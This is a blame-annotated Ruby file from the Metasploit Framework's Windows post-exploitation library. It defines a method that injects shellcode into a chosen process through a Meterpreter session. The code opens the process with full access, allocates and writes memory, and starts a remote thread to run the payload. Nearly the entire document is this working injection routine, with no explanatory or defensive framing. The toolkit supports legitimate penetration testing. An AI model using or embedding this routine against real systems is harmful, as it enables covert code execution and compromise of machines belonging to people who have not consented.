2013-06-28 12:55:06 -05:00
|
|
|
# -*- coding: binary -*-
|
|
|
|
|
|
|
|
|
|
module Msf
|
|
|
|
|
class Post
|
|
|
|
|
module Windows
|
|
|
|
|
|
|
|
|
|
module Process
|
|
|
|
|
|
2013-08-30 16:28:33 -05:00
|
|
|
#
|
|
|
|
|
# Injects shellcode to a process, and executes it.
|
|
|
|
|
#
|
|
|
|
|
# @param shellcode [String] The shellcode to execute
|
2017-01-17 14:09:27 -06:00
|
|
|
# @param base_addr [Integer] The base address to allocate memory
|
|
|
|
|
# @param pid [Integer] The process ID to inject to
|
2013-08-30 16:28:33 -05:00
|
|
|
#
|
|
|
|
|
# @return [Boolean] True if successful, otherwise false
|
|
|
|
|
#
|
|
|
|
|
def execute_shellcode(shellcode, base_addr=nil, pid=nil)
|
|
|
|
|
pid ||= session.sys.process.getpid
|
|
|
|
|
host = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
|
|
|
|
|
if base_addr.nil?
|
|
|
|
|
shell_addr = host.memory.allocate(shellcode.length)
|
|
|
|
|
else
|
|
|
|
|
shell_addr = host.memory.allocate(shellcode.length, nil, base_addr)
|
|
|
|
|
end
|
2013-12-12 08:26:44 -06:00
|
|
|
|
|
|
|
|
host.memory.protect(shell_addr)
|
|
|
|
|
|
2013-08-30 16:28:33 -05:00
|
|
|
if host.memory.write(shell_addr, shellcode) < shellcode.length
|
|
|
|
|
vprint_error("Failed to write shellcode")
|
|
|
|
|
return false
|
|
|
|
|
end
|
2013-06-28 12:55:06 -05:00
|
|
|
|
2013-08-30 16:28:33 -05:00
|
|
|
vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{pid.to_s})")
|
2013-12-12 08:26:44 -06:00
|
|
|
thread = host.thread.create(shell_addr,0)
|
|
|
|
|
unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread)
|
2013-12-12 09:06:29 -06:00
|
|
|
vprint_error("Unable to create thread")
|
2014-06-01 11:55:40 +01:00
|
|
|
nil
|
2013-08-30 16:28:33 -05:00
|
|
|
end
|
2013-06-28 12:55:06 -05:00
|
|
|
|
2014-06-01 11:49:56 +01:00
|
|
|
thread
|
2013-08-30 16:28:33 -05:00
|
|
|
end
|
2013-06-28 12:55:06 -05:00
|
|
|
|
|
|
|
|
end # Process
|
|
|
|
|
end # Windows
|
|
|
|
|
end # Post
|
|
|
|
|
end # Msf
|
